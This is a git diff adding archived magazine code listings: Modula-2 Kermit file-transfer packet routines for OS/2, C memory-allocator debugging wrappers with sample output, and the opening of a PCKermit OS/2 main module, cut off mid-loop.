+ (* From Definition Module + yourNPAD : INTEGER; (* number of padding characters *) + yourPADC : CHAR; (* padding characters *) + yourEOL : CHAR; (* End Of Line -- terminator *) + *) + yourQCTL : CHAR; (* character for quoting controls '#' *) + yourQBIN : CHAR; (* character for quoting binary '&' *) + yourCHKT : CHAR; (* check type -- 1 = checksum, etc. *) + sF, rF : File; (* files being sent/received *) + InputFileOpen : BOOLEAN; + rFname : ARRAY [0..20] OF CHAR; + sP, rP : PacketType; (* packets sent/received *) + sSeq, rSeq : INTEGER; (* sequence numbers *) + PktNbr : INTEGER; (* actual packet number -- no repeats up to 32,000 *) + ErrorMsg : ARRAY [0..40] OF CHAR; + + + PROCEDURE PtrToStr (mp : MPARAM; VAR s : ARRAY OF CHAR); + (* Convert a pointer to a string into a string *) + + TYPE + PC = POINTER TO CHAR; + + VAR + p : PC; + i : CARDINAL; + c : CHAR; + + BEGIN + i := 0; + REPEAT + p := PC (mp); + c := p^; + s[i] := c; + INC (i); + INC (mp); + UNTIL c = 0C; + END PtrToStr; + + + PROCEDURE DoPADMsg (mp1, mp2 : MPARAM); + (* Output messages for Packet Assembler/Disassembler *) + + VAR + Message : ARRAY [0..40] OF CHAR; + + BEGIN + CASE LOWORD (mp1) OF + PAD_SendPacket: + WriteString ("Sent Packet #"); + WriteInt (LOWORD (mp2), 5); + WriteString (" (ID: "); WriteHex (HIWORD (mp2), 2); + WriteString ("h)"); + | PAD_ResendPacket: + WriteString ("ERROR -- Resending:"); WriteLn; + WriteString (" Packet #"); + WriteInt (LOWORD (mp2), 5); + WriteString (" (ID: "); WriteHex (HIWORD (mp2), 2); + WriteString ("h)"); + | PAD_NoSuchFile: + WriteString ("No such file: "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_ExcessiveErrors: + WriteString ("Excessive errors ..."); + | PAD_ProbClSrcFile: + WriteString ("Problem closing source file..."); + | PAD_ReceivedPacket: + WriteString ("Received Packet #"); + WriteInt (LOWORD (mp2), 5); + WriteString (" (ID: "); WriteHex (HIWORD (mp2), 2); + WriteString ("h)"); + | PAD_Filename: + WriteString ("Filename = "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_RequestRepeat: + WriteString ("ERROR -- Requesting Repeat:"); WriteLn; + WriteString (" Packet #"); + WriteInt (LOWORD (mp2), 5); + WriteString (" (ID: "); WriteHex (HIWORD (mp2), 2); + WriteString ("h)"); + | PAD_DuplicatePacket: + WriteString ("Discarding Duplicate:"); WriteLn; + WriteString (" Packet #"); + WriteString (" (ID: "); WriteHex (HIWORD (mp2), 2); + WriteString ("h)"); + | PAD_UnableToOpen: + WriteString ("Unable to open file: "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_ProbClDestFile: + WriteString ("Error closing file: "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_ErrWrtFile: + WriteString ("Error writing to file: "); + PtrToStr (mp2, Message); WriteString (Message); + | PAD_Msg: + PtrToStr (mp2, Message); WriteString (Message); + ELSE + (* Do Nothing *) + END; + WriteLn; + END DoPADMsg; + + + PROCEDURE CloseInput; + (* Close the input file, if it exists. Reset Input File Open flag *) + BEGIN + IF InputFileOpen THEN + IF CloseFile (sF, Input) = Done THEN + InputFileOpen := FALSE; + ELSE + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ProbClSrcFile, 0), + ADR (sFname)); + END; + END; + END CloseInput; + + + PROCEDURE NormalQuit; + (* Exit from Thread, Post message to Window *) + BEGIN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Quit, 0), 0); + DosExit (EXIT_THREAD, 0); + END NormalQuit; + + + PROCEDURE ErrorQuit; + (* Exit from Thread, Post message to Window *) + BEGIN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Error, 0), 0); + DosExit (EXIT_THREAD, 0); + END ErrorQuit; + + + PROCEDURE ByteXor (a, b : BYTE) : BYTE; + BEGIN + RETURN BYTE (SMALLSET (a) / SMALLSET (b)); + END ByteXor; + + + PROCEDURE Char (c : INTEGER) : CHAR; + (* converts a number 0-94 into a printable character *) + BEGIN + RETURN (CHR (CARDINAL (ABS (c) + 32))); + END Char; + + + PROCEDURE UnChar (c : CHAR) : INTEGER; + (* converts a character into its corresponding number *) + BEGIN + RETURN (ABS (INTEGER (ORD (c)) - 32)); + END UnChar; + + + PROCEDURE TellError (Seq : INTEGER); + (* Send error packet *) + BEGIN + sP[1] := Char (15); + sP[2] := Char (Seq); + sP[3] := 'E'; (* E-type packet *) + sP[4] := 'R'; (* error message starts *) + sP[5] := 'e'; + sP[6] := 'm'; + sP[7] := 'o'; + sP[8] := 't'; + sP[9] := 'e'; + sP[10] := ' '; + sP[11] := 'A'; + sP[12] := 'b'; + sP[13] := 'o'; + sP[14] := 'r'; + sP[15] := 't'; + sP[16] := 0C; + SendPacket (sP); + END TellError; + + + PROCEDURE ShowError (p : PacketType); + (* Output contents of error packet to the screen *) + + VAR + i : INTEGER; + + BEGIN + FOR i := 4 TO UnChar (p[1]) DO + ErrorMsg[i - 4] := p[i]; + END; + ErrorMsg[i - 4] := 0C; + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Msg, 0), ADR (ErrorMsg)); + END ShowError; + + + PROCEDURE youInit (type : CHAR); + (* I initialization YOU for Send and Receive *) + BEGIN + sP[1] := Char (11); (* Length *) + sP[2] := Char (0); (* Sequence *) + sP[3] := type; + sP[4] := Char (myMAXL); + sP[5] := Char (myTIME); + sP[6] := Char (myNPAD); + sP[7] := CHAR (ByteXor (myPADC, 100C)); + sP[8] := Char (ORD (myEOL)); + sP[9] := myQCTL; + sP[10] := myQBIN; + sP[11] := myCHKT; + sP[12] := 0C; (* terminator *) + SendPacket (sP); + END youInit; + + + PROCEDURE myInit; + (* YOU initialize ME for Send and Receive *) + + VAR + len : INTEGER; + + BEGIN + len := UnChar (rP[1]); + IF len >= 4 THEN + yourMAXL := UnChar (rP[4]); + ELSE + yourMAXL := 94; + END; + IF len >= 5 THEN + yourTIME := UnChar (rP[5]); + ELSE + yourTIME := 10; + END; + IF len >= 6 THEN + yourNPAD := UnChar (rP[6]); + ELSE + yourNPAD := 0; + END; + IF len >= 7 THEN + yourPADC := CHAR (ByteXor (rP[7], 100C)); + ELSE + yourPADC := 0C; + END; + IF len >= 8 THEN + yourEOL := CHR (UnChar (rP[8])); + ELSE + yourEOL := 0C; + END; + IF len >= 9 THEN + yourQCTL := rP[9]; + ELSE + yourQCTL := 0C; + END; + IF len >= 10 THEN + yourQBIN := rP[10]; + ELSE + yourQBIN := 0C; + END; + IF len >= 11 THEN + yourCHKT := rP[11]; + IF yourCHKT # myCHKT THEN + yourCHKT := '1'; + END; + ELSE + yourCHKT := '1'; + END; + END myInit; + + + PROCEDURE SendInit; + BEGIN + youInit ('S'); + END SendInit; + + + PROCEDURE SendFileName; + + VAR + i, j : INTEGER; + + BEGIN + (* send file name *) + i := 4; j := 0; + WHILE sFname[j] # 0C DO + sP[i] := sFname[j]; + INC (i); INC (j); + END; + sP[1] := Char (j + 3); + sP[2] := Char (sSeq); + sP[3] := 'F'; (* filename packet *) + sP[i] := 0C; + SendPacket (sP); + END SendFileName; + + + PROCEDURE SendEOF; + BEGIN + sP[1] := Char (3); + sP[2] := Char (sSeq); + sP[3] := 'Z'; (* end of file *) + sP[4] := 0C; + SendPacket (sP); + END SendEOF; + + + PROCEDURE SendEOT; + BEGIN + sP[1] := Char (3); + sP[2] := Char (sSeq); + sP[3] := 'B'; (* break -- end of transmit *) + sP[4] := 0C; + SendPacket (sP); + END SendEOT; + + + PROCEDURE GetAck() : BOOLEAN; + (* Look for acknowledgement -- retry on timeouts or NAKs *) + + VAR + Type : CHAR; + Seq : INTEGER; + retrys : INTEGER; + AckOK : BOOLEAN; + + BEGIN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_SendPacket, 0), + MPFROM2SHORT (PktNbr, sSeq)); + + retrys := MAXtrys; + LOOP + IF Aborted THEN + TellError (sSeq); + CloseInput; + ErrorQuit; + END; + IF ReceivePacket (rP) THEN + Seq := UnChar (rP[2]); + Type := rP[3]; + IF (Seq = sSeq) AND (Type = 'Y') THEN + AckOK := TRUE; + ELSIF (Seq = (sSeq + 1) MOD 64) AND (Type = 'N') THEN + AckOK := TRUE; (* NAK for (n + 1) taken as ACK for n *) + ELSIF Type = 'E' THEN + ShowError (rP); + AckOK := FALSE; + retrys := 0; + ELSE + AckOK := FALSE; + END; + ELSE + AckOK := FALSE; + END; + IF AckOK OR (retrys = 0) THEN + EXIT; + ELSE + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ResendPacket, 0), + MPFROM2SHORT (PktNbr, sSeq)); + + DEC (retrys); + FlushUART; + SendPacket (sP); + END; + END; + + IF AckOK THEN + INC (PktNbr); + sSeq := (sSeq + 1) MOD 64; + RETURN TRUE; + ELSE + RETURN FALSE; + END; + END GetAck; + + + PROCEDURE GetInitAck() : BOOLEAN; + (* configuration for remote station *) + BEGIN + IF GetAck() THEN + myInit; + RETURN TRUE; + ELSE + RETURN FALSE; + END; + END GetInitAck; + + + PROCEDURE Send; + (* Send one or more files: sFname may be ambiguous *) + + TYPE + LP = POINTER TO LIST; (* list of filenames *) + LIST = RECORD + fn : ARRAY [0..20] OF CHAR; + next : LP; + END; + + VAR + gotFN : BOOLEAN; + attr : AttributeSet; + ent : DirectoryEntry; + front, back, t : LP; (* add at back of queue, remove from front *) + + BEGIN + Aborted := FALSE; + InputFileOpen := FALSE; + + front := NIL; back := NIL; + attr := AttributeSet {}; (* normal files only *) + IF Length (sFname) = 0 THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Msg, 0), + ADR ("No file specified...")); + ErrorQuit; + ELSE + gotFN := FindFirst (sFname, attr, ent); + WHILE gotFN DO (* build up a list of file names *) + ALLOCATE (t, SIZE (LIST)); + Assign (ent.name, t^.fn); + t^.next := NIL; + IF front = NIL THEN + front := t; (* start from empty queue *) + ELSE + back^.next := t; (* and to back of queue *) + END; + back := t; + gotFN := FindNext (ent); + END; + END; + + IF front = NIL THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_NoSuchFile, 0), + ADR (sFname)); + ErrorQuit; + ELSE + sSeq := 0; PktNbr := 0; + FlushUART; + SendInit; (* my configuration information *) + IF NOT GetInitAck() THEN (* get your configuration information *) + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + ErrorQuit; + END; + + WHILE front # NIL DO (* send the files *) + Assign (front^.fn, sFname); + PktNbr := 1; + Send1; + t := front; + front := front^.next; + DEALLOCATE (t, SIZE (LIST)); + END; + END; + + SendEOT; + IF NOT GetAck() THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + CloseInput; + ErrorQuit; + END; + NormalQuit; + END Send; + + + PROCEDURE Send1; + (* Send one file: sFname *) + + VAR + ch : CHAR; + i : INTEGER; + + BEGIN + IF Open (sF, sFname) = Done THEN + InputFileOpen := TRUE; + ELSE; + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_NoSuchFile, 0), + ADR (sFname)); + ErrorQuit; + END; + + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Filename, 0), + ADR (sFname)); + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Msg, 0), + ADR ("( to abort file transfer.)")); + + SendFileName; + IF NOT GetAck() THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + CloseInput; + ErrorQuit; + END; + + (* send file *) + i := 4; + LOOP + IF Get (sF, ch) = EOF THEN (* send current packet & terminate *) + sP[1] := Char (i - 1); + sP[2] := Char (sSeq); + sP[3] := 'D'; (* data packet *) + sP[i] := 0C; (* indicate end of packet *) + SendPacket (sP); + IF NOT GetAck() THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + CloseInput; + ErrorQuit; + END; + SendEOF; + IF NOT GetAck() THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + CloseInput; + ErrorQuit; + END; + EXIT; + END; + + IF i >= (yourMAXL - 4) THEN (* send current packet *) + sP[1] := Char (i - 1); + sP[2] := Char (sSeq); + sP[3] := 'D'; + sP[i] := 0C; + SendPacket (sP); + IF NOT GetAck() THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + CloseInput; + ErrorQuit; + END; + i := 4; + END; + + (* add character to current packet -- update count *) + IF ch > 177C THEN (* must be quoted (QBIN) and altered *) + (* toggle bit 7 to turn it off *) + ch := CHAR (ByteXor (ch, 200C)); + sP[i] := myQBIN; INC (i); + END; + IF (ch < 40C) OR (ch = 177C) THEN (* quote (QCTL) and alter *) + (* toggle bit 6 to turn it on *) + ch := CHAR (ByteXor (ch, 100C)); + sP[i] := myQCTL; INC (i); + END; + IF (ch = myQCTL) OR (ch = myQBIN) THEN (* must send it quoted *) + sP[i] := myQCTL; INC (i); + END; + sP[i] := ch; INC (i); + END; (* loop *) + + CloseInput; + END Send1; + + + PROCEDURE ReceiveInit() : BOOLEAN; + (* receive my initialization information from you *) + + VAR + RecOK : BOOLEAN; + trys : INTEGER; + + BEGIN + trys := 1; + LOOP + IF Aborted THEN + TellError (rSeq); + ErrorQuit; + END; + RecOK := ReceivePacket (rP) AND (rP[3] = 'S'); + IF RecOK OR (trys = MAXtrys) THEN + EXIT; + ELSE + INC (trys); + SendNak; + END; + END; + + IF RecOK THEN + myInit; + RETURN TRUE; + ELSE + RETURN FALSE; + END; + END ReceiveInit; + + + PROCEDURE SendInitAck; + (* acknowledge your initialization of ME and send mine for YOU *) + BEGIN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ReceivedPacket, 0), + MPFROM2SHORT (PktNbr, rSeq)); + INC (PktNbr); + rSeq := (rSeq + 1) MOD 64; + youInit ('Y'); + END SendInitAck; + + + PROCEDURE ValidFileChar (VAR ch : CHAR) : BOOLEAN; + (* checks if character is one of 'A'..'Z', '0'..'9', makes upper case *) + BEGIN + ch := CAP (ch); + RETURN ((ch >= 'A') AND (ch <= 'Z')) OR ((ch >= '0') AND (ch <= '9')); + END ValidFileChar; + + + TYPE + HeaderType = (name, eot, fail); + + PROCEDURE ReceiveHeader() : HeaderType; + (* receive the filename -- alter for local conditions, if necessary *) + + VAR + i, j, k : INTEGER; + RecOK : BOOLEAN; + trys : INTEGER; + + BEGIN + trys := 1; + LOOP + IF Aborted THEN + TellError (rSeq); + ErrorQuit; + END; + RecOK := ReceivePacket (rP) AND ((rP[3] = 'F') OR (rP[3] = 'B')); + IF trys = MAXtrys THEN + RETURN fail; + ELSIF RecOK AND (rP[3] = 'F') THEN + i := 4; (* data starts here *) + j := 0; (* beginning of filename string *) + WHILE (ValidFileChar (rP[i])) AND (j < 8) DO + rFname[j] := rP[i]; + INC (i); INC (j); + END; + REPEAT + INC (i); + UNTIL (ValidFileChar (rP[i])) OR (rP[i] = 0C); + rFname[j] := '.'; INC (j); + k := 0; + WHILE (ValidFileChar (rP[i])) AND (k < 3) DO + rFname[j + k] := rP[i]; + INC (i); INC (k); + END; + rFname[j + k] := 0C; + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Filename, 0), + ADR (rFname)); + RETURN name; + ELSIF RecOK AND (rP[3] = 'B') THEN + RETURN eot; + ELSE + INC (trys); + SendNak; + END; + END; + END ReceiveHeader; + + + PROCEDURE SendNak; + BEGIN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_RequestRepeat, 0), + MPFROM2SHORT (PktNbr, rSeq)); + FlushUART; + sP[1] := Char (3); (* LEN *) + sP[2] := Char (rSeq); + sP[3] := 'N'; (* negative acknowledgement *) + sP[4] := 0C; + SendPacket (sP); + END SendNak; + + + PROCEDURE SendAck (Seq : INTEGER); + BEGIN + IF Seq # rSeq THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_DuplicatePacket, 0), + MPFROM2SHORT (0, rSeq)); + ELSE + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ReceivedPacket, 0), + MPFROM2SHORT (PktNbr, rSeq)); + rSeq := (rSeq + 1) MOD 64; + INC (PktNbr); + END; + + sP[1] := Char (3); + sP[2] := Char (Seq); + sP[3] := 'Y'; (* acknowledgement *) + sP[4] := 0C; + SendPacket (sP); + END SendAck; + + + PROCEDURE Receive; + (* Receives a file (or files) *) + + VAR + ch, Type : CHAR; + Seq : INTEGER; + i : INTEGER; + EOF, EOT, QBIN : BOOLEAN; + trys : INTEGER; + + BEGIN + Aborted := FALSE; + + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Msg, 0), + ADR ("Ready to receive file(s)...")); + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_Msg, 0), + ADR ("( to abort file transfer.)")); + + FlushUART; + rSeq := 0; PktNbr := 0; + IF NOT ReceiveInit() THEN (* your configuration information *) + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + ErrorQuit; + END; + SendInitAck; (* send my configuration information *) + EOT := FALSE; + WHILE NOT EOT DO + CASE ReceiveHeader() OF + eot : EOT := TRUE; EOF := TRUE; + | name : IF Create (rF, rFname) # Done THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_UnableToOpen, 0), + ADR (rFname)); + ErrorQuit; + ELSE + PktNbr := 1; + EOF := FALSE; + END; + | fail : WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + ErrorQuit; + END; + SendAck (rSeq); (* acknowledge for name or eot *) + trys := 1; (* initialize *) + WHILE NOT EOF DO + IF Aborted THEN + TellError (rSeq); + ErrorQuit; + END; + IF ReceivePacket (rP) THEN + Seq := UnChar (rP[2]); + Type := rP[3]; + IF Type = 'Z' THEN + EOF := TRUE; + IF CloseFile (rF, Output) = Done THEN + (* normal file termination *) + ELSE + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ProbClDestFile, 0), + ADR (rFname)); + ErrorQuit; + END; + trys := 1; (* good packet -- reset *) + SendAck (rSeq); + ELSIF Type = 'E' THEN + ShowError (rP); + ErrorQuit; + ELSIF (Type = 'D') AND ((Seq + 1) MOD 64 = rSeq) THEN + (* discard duplicate packet, and Ack anyway *) + trys := 1; + SendAck (Seq); + ELSIF (Type = 'D') AND (Seq = rSeq) THEN + (* put packet into file buffer *) + i := 4; (* first data in packet *) + WHILE rP[i] # 0C DO + ch := rP[i]; INC (i); + IF ch = yourQBIN THEN + ch := rP[i]; INC (i); + QBIN := TRUE; + ELSE + QBIN := FALSE; + END; + IF ch = yourQCTL THEN + ch := rP[i]; INC (i); + IF (ch # yourQCTL) AND (ch # yourQBIN) THEN + ch := CHAR (ByteXor (ch, 100C)); + END; + END; + IF QBIN THEN + ch := CHAR (ByteXor (ch, 200C)); + END; + Put (ch); + END; + + (* write file buffer to disk *) + IF DoWrite (rF) # Done THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ErrWrtFile, 0), + ADR (rFname)); + ErrorQuit; + END; + trys := 1; + SendAck (rSeq); + ELSE + INC (trys); + IF trys = MAXtrys THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + ErrorQuit; + ELSE + SendNak; + END; + END; + ELSE + INC (trys); + IF trys = MAXtrys THEN + WinPostMsg (ChildFrameWindow, WM_PAD, + MPFROM2SHORT (PAD_ExcessiveErrors, 0), + MPFROM2SHORT (0, 0)); + ErrorQuit; + ELSE + SendNak; + END; + END; + END; + END; + NormalQuit; + END Receive; + + +BEGIN (* module initialization *) + yourEOL := ASCII.cr; + yourNPAD := 0; + yourPADC := 0C; +END PAD. + + \ No newline at end of file diff --git a/textfiles.com/computers/anderson.lst b/textfiles.com/computers/anderson.lst new file mode 100644 index 00000000..5ae9cc4c --- /dev/null +++ b/textfiles.com/computers/anderson.lst @@ -0,0 +1,247 @@ +_C CUSTOMIZED MEMORY ALLOCATORS_ +by Paul Anderson + +[LISTING ONE] + + +/* sym1.c - symbol table data types */ + +#include +#include "xalloc.h" +#include "defs.h" + +main() +{ + Symbol *p1, *p2; + char *ps = "test string"; + int *p5; + + p1 = (Symbol *) xmalloc(sizeof(struct Symbol)); + p1->dtype = STRING; + p1->val.pstring = xmalloc(strlen(ps) + 1); + strcpy(p1->val.pstring, ps); + + p2 = (Symbol *) xmalloc(sizeof(struct Symbol)); + p2->dtype = DOUBLE; + p2->val.pdouble = (double *) xmalloc(sizeof(double)); + *p2->val.pdouble = 6.7e-13; + + printf("%s\n", p1->val.pstring); + printf("%g\n", *p2->val.pdouble); + + p5 = (int *) xmalloc(30000 * sizeof(int)); +} + +$ sym1 +test string +6.7e-13 +file sym1.c - line 26: malloc error for 60000 bytes + + +[LISTING TWO] + +#include +#include + +#define MAXBUF 256 /* size of debug buffer */ +static char *dbuf[MAXBUF]; /* debug buffer */ + +/* ymalloc2.c - front end for malloc() + Version 2 +*/ + +char *ymalloc(file, lineno, nbytes) +char *file; +int lineno; +unsigned int nbytes; +{ + char *pheap; + void install(); + + pheap = malloc(nbytes); + if (pheap == (char *) NULL) { + fprintf(stderr,"file %s - line %d: malloc error for %u bytes\n", + file, lineno, nbytes); + exit(1); + } + install(pheap); /* place in debug buffer */ + return pheap; +} + +void install(pheap) /* store heap pointer in debug buffer */ +char *pheap; +{ + register char **pbuf; + + for (pbuf = dbuf; pbuf < dbuf + MAXBUF; pbuf++) + if (*pbuf == (char *) NULL) { + *pbuf = pheap; + return; + } + fprintf(stderr, "No room left in debug buffer\n"); + exit(1); +} + +char *yrealloc(file, lineno, oldp, nbytes) +char *file, *oldp; +int lineno; +unsigned int nbytes; +{ + char *newp; + register char **pbuf; + short found = 0; + + if (oldp != (char *) NULL) + for (pbuf = dbuf; pbuf < dbuf + MAXBUF; pbuf++) + if (*pbuf == oldp) { /* find oldp's slot */ + found = 1; + break; + } + if (!found) { + fprintf(stderr,"file %s - line %d: realloc error for address %x\n", + file, lineno, oldp); + exit(1); + } + newp = realloc(oldp, nbytes); + if (newp == (char *) NULL) { + fprintf(stderr,"file %s - line %d: realloc error for %u bytes\n", + file, lineno, nbytes); + exit(1); + } + *pbuf = newp; /* replace in debug buffer's old slot */ + return newp; +} + +void yfree(file, lineno, pheap) +char *file, *pheap; +int lineno; +{ + register char **pbuf; + + if (pheap != (char *) NULL) + for (pbuf = dbuf; pbuf < dbuf + MAXBUF; pbuf++) + if (*pbuf == pheap) { + *pbuf = NULL; + free(pheap); + return; + } + fprintf(stderr,"file %s - line %d: free error for address %x\n", + file, lineno, pheap); + exit(1); +} + + +[LISTING THREE] + + +/* sym2.c - more symbol table data types */ + +#include +#include "xalloc.h" +#include "defs.h" + +main() +{ + Symbol *p1, *p2; + char *ps = "test string"; + char *ps2 = "much longer test string"; + + p1 = (Symbol *) xmalloc(sizeof(struct Symbol)); + p1->dtype = STRING; + p1->val.pstring = xmalloc(strlen(ps) + 1); + strcpy(p1->val.pstring, ps); + + p2 = (Symbol *) xmalloc(sizeof(struct Symbol)); + p2->dtype = DOUBLE; + p2->val.pdouble = (double *) xmalloc(sizeof(double)); + *p2->val.pdouble = 6.7e-13; + + printf("%s\n", p1->val.pstring); + printf("%g\n", *p2->val.pdouble); + + p1->val.pstring = xrealloc(p1->val.pstring, strlen(ps2) + 1); + strcpy(p1->val.pstring, ps2); + printf("%s\n", p1->val.pstring); + + xfree((char *) p2->val.pdouble); + xfree(ps2); /* free a bad pointer */ +} + +$ sym2 +test string +6.7e-13 +much longer test string +file sym2.c - line 31: free error for address 2634 + + + +Example 1: Out of bounds references + +/* twzone.c - array out of bounds */ + +main() +{ + int buf[10]; + + buf[-4] = 1; /* negative subscript */ + buf[10] = 2; /* one step beyond */ + + printf("%d %d\n", *(buf - 4), *(buf + 10)); +} + + +Example 2: Program that demonstartes xcalloc() + + +/* neg.c - negative subscripts with xcalloc */ + +#include + +main() +{ + char *xcalloc(); + int *p, *q; + + p = (int *) xcalloc(10, sizeof(int)); + q = (int *) xcalloc(15, sizeof(int)); + + fill(p); /* fill with 10 numbers */ + display(p); /* print 10 numbers */ + + fill(q); /* fill with 15 numbers */ + display(q); /* print 15 numbers */ +} + +$ neg + 1 2 3 4 5 6 7 8 9 10 + 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 + + + Example 3: xcalloc() routine + + + +#include +#include +#include + +char *xcalloc(nitems, size) /* custom calloc() */ +unsigned nitems, size; +{ + char *pheap; + unsigned blksize; + + blksize = nitems * size; /* size of chunk */ + + if ((pheap = malloc(blksize + sizeof(int))) == NULL) { + fprintf(stderr, "Can't malloc on heap\n"); + exit(1); + } + *(int *)pheap = nitems; /* store no. of items in heap */ + + memset(pheap + sizeof(int), 0, blksize); /* zero the area */ + + return pheap + sizeof(int); /* pointer to data */ +} + + \ No newline at end of file diff --git a/textfiles.com/computers/andrson2.asc b/textfiles.com/computers/andrson2.asc new file mode 100644 index 00000000..e821cec9 --- /dev/null +++ b/textfiles.com/computers/andrson2.asc @@ -0,0 +1,4220 @@ +_KERMIT FOR OS/2_ +by Brian R. Anderson + +[LISTING ONE] + + +MODULE PCKermit; +(**************************************************************************) +(* *) +(* PCKermit -- by Brian R. Anderson *) +(* Copyright (c) 1990 *) +(* *) +(* PCKermit is an implementation of the Kermit file transfer protocol *) +(* developed at Columbia University. This (OS/2 PM) version is a *) +(* port from the DOS version of Kermit that I wrote two years ago. *) +(* My original DOS version appeared in the May 1989 issue of DDJ. *) +(* *) +(* The current version includes emulation of the TVI950 Video Display *) +(* Terminal for interaction with IBM mainframes (through the IBM 7171). *) +(* *) +(**************************************************************************) + + FROM SYSTEM IMPORT + ADR; + + FROM OS2DEF IMPORT + HAB, HWND, HPS, NULL, ULONG; + + FROM PMWIN IMPORT + MPARAM, HMQ, QMSG, CS_SIZEREDRAW, WS_VISIBLE, FS_ICON, + FCF_TITLEBAR, FCF_SYSMENU, FCF_SIZEBORDER, FCF_MINMAX, FCF_ACCELTABLE, + FCF_SHELLPOSITION, FCF_TASKLIST, FCF_MENU, FCF_ICON, + SWP_MOVE, SWP_SIZE, SWP_MAXIMIZE, + HWND_DESKTOP, FID_SYSMENU, SC_CLOSE, MIA_DISABLED, MM_SETITEMATTR, + WinInitialize, WinCreateMsgQueue, WinGetMsg, WinDispatchMsg, WinSendMsg, + WinRegisterClass, WinCreateStdWindow, WinDestroyWindow, WinWindowFromID, + WinDestroyMsgQueue, WinTerminate, WinSetWindowText, + WinSetWindowPos, WinQueryWindowPos; + + FROM KH IMPORT + IDM_KERMIT; + + FROM Shell IMPORT + Class, Title, Child, WindowProc, ChildWindowProc, + FrameWindow, ClientWindow, SetPort, Pos; + + + CONST + QUEUE_SIZE = 1024; (* Large message queue for async events *) + + VAR + AnchorBlock : HAB; + MessageQueue : HMQ; + Message : QMSG; + FrameFlags : ULONG; + hsys : HWND; + MP1, MP2 : MPARAM; + + +BEGIN (* main *) + AnchorBlock := WinInitialize(0); + + IF AnchorBlock # 0 THEN + MessageQueue := WinCreateMsgQueue (AnchorBlock, QUEUE_SIZE); + + IF MessageQueue # 0 THEN + (* Register the parent window class *) + WinRegisterClass ( + AnchorBlock, + ADR (Class), + WindowProc, + CS_SIZEREDRAW, 0); + + (* Register a child window class *) + WinRegisterClass ( + AnchorBlock, + ADR (Child), + ChildWindowProc, + CS_SIZEREDRAW, 0); + + (* Create a standard window *) + FrameFlags := FCF_TITLEBAR + FCF_MENU + FCF_MINMAX + + FCF_SYSMENU + FCF_SIZEBORDER + FCF_TASKLIST + + FCF_ICON + FCF_SHELLPOSITION + FCF_ACCELTABLE; + + FrameWindow := WinCreateStdWindow ( + HWND_DESKTOP, (* handle of the parent window *) + WS_VISIBLE + FS_ICON, (* the window style *) + FrameFlags, (* the window flags *) + ADR(Class), (* the window class *) + NULL, (* the title bar text *) + WS_VISIBLE, (* client window style *) + NULL, (* handle of resource module *) + IDM_KERMIT, (* resource id *) + ClientWindow (* returned client window handle *) + ); + + IF FrameWindow # 0 THEN + (* Disable the CLOSE item on the system menu *) + hsys := WinWindowFromID (FrameWindow, FID_SYSMENU); + MP1.W1 := SC_CLOSE; MP1.W2 := 1; + MP2.W1 := MIA_DISABLED; MP2.W2 := MIA_DISABLED; + WinSendMsg (hsys, MM_SETITEMATTR, MP1, MP2); + + (* Expand Window to Nearly Full Size, And Display the Title *) + WinQueryWindowPos (HWND_DESKTOP, Pos); + WinSetWindowPos (FrameWindow, 0, + Pos.x + 3, Pos.y + 3, Pos.cx - 6, Pos.cy - 6, + SWP_MOVE + SWP_SIZE); + WinSetWindowText (FrameWindow, ADR (Title)); + + SetPort; (* Try to initialize communications port *) + + WHILE WinGetMsg(AnchorBlock, Message, NULL, 0, 0) # 0 DO + 